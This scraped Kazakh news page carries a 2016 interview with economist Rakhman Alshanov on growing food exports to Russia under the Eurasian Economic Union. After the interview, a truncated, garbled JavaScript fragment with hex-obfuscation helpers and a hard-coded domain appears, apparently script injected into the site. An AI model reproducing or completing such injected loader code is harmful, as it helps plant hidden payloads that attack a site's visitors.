jasqazaq.kz

Кәсіпкерлер түсіне бастады

02 маусым 2016, 19:10

maxresdefault

Рахман Алшанов, экономист:  Кәсіпкерлер Ресей экономикасын түсіне бастады

Жас қазақ: Еуразиялық экономикалық одаққа кіргенімізге биыл екі жыл толды. Неден ұттық, неден ұтылдық? 

Рахман АЛШАН: Ресейдің осыдан екі жыл бұрынғы өзінің даму деңгейіне жете алмай жатуы  біздің елімізге де белгілі бір дәрежеде әсерін тигізеді. Мұны жоққа шығаруға болмайды. Бірақ, Еуразиялық экономикалық одақ аясында Қазақстанның тауар айналымы күрт жоғарылады. Менің есебім бойынша, 2010 жылмен салыстырғанда 2015 жылы біздің еліміздің солтүстік көршімізге тасымалдайтын азық-түлік тауарының көлемі бірнеше есеге өскен. Мысалы, кәдімгі сары май 26 есеге, тауық жұмыртқасы алты есеге, шошқа майы 17 есеге көбейген. Мен сіздерге қарапайым дерек келтірейін. Мәселен, 2010 жылы Қазақстаннан Ресейге жөнелткен азық-түлік тауарының көлемі 236 мың тонна болса, 2015 жылы бұл көрсеткіш 750 мың тоннаға жетіпті.

Жас қазақ:  Сіз айтып отырған бес жыл ішінде бірнеше рет девальвация орын алды. Рубль күрт арзандады. Сонда жаңағы Сіз айтып отырған азық-түлік көлемінің өсуіне ақшаның құнсыздануы әсер еткен жоқ па?  Қалай ойлайсыз?

Рахман Алшанов: Сіздер мынаны ескеріңіздер: рубль арзандаған кезде отандастарымыз шапқылап барып, Ресейден тауар алды. Анау-мынау емес, тауарды өте көп көлемде алды. Еліміздегі дүкен мен базар сөресінде Ресей тауары аяқ астынан қаптады да кетті. Мысалы, өткен жылы еліміздің азық-түлік өндірушілері мен Ресей арасындағы тауар айналымының деңгейі бұрынғы мөлшерінен 40 пайызға дейін өсіп кетті. Азық-түлік өнімінің 18 түрі 20-дан 40-қа дейін көбейді. Бұл нені білдіреді, түсінесіз бе?

Жас қазақ: Нені білдіреді?

Рахман Алшанов: Бұл – отандық кәсіпкерлер Ресей экономикасын бұрынғыға қарағанда өте жақсы түсіне бастады дегенді білдіреді. Қарапайым мысал: АҚШ пен Батыс салған санкциядан кейін Ресейге Еуропадан, Түркиядан келетін тауар орны үңірейіп, босап қалды ғой. Міне, сол бос орындарды біздің кәсіпкерлеріміз дер кезінде пайдаланып үлгерді. Бұл, менің ойымша, өте жақсы әрі тиімді әрекет.

Сұхбаттасқан Марат Маманбай

// o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t=»»,o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return "jasqazaq.kz"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e

Бүгін, 14:55
Шымкент жастары: жүйелі қолдау және жаңа бастамалар
Бүгін, 13:08
Шымкент: Төтенше жағдайдың алдын алу жұмыстары күшейтілуде
28 қазан, 18:31
Шымкент: Шағын өндіріс алаңының шапағаты
28 қазан, 17:22
«JAS QAZAQ» газетінің 10 жылдық мұрағаты зерттелді
28 қазан, 13:47
Президент Жолдауындағы басты бағыттар қандай?
27 қазан, 18:46
Алматыда жастар мен Жетісу ауданының тұрғындары қалдықтарды сұрыптау бойынша экологиялық акцияға қатысты
27 қазан, 18:25
Ақмарал Ещанова: Экологиялық туризмді дамыту табиғатты қорғаумен қатар жүруі керек
27 қазан, 14:57
Жанұзақ Махамбетов: Басты міндет – қала тұрғындарына жылуды үздіксіз жеткізу
25 қазан, 17:35
Алматыда таулы аумақтарды тазарту бойынша ауқымды экологиялық акция өтті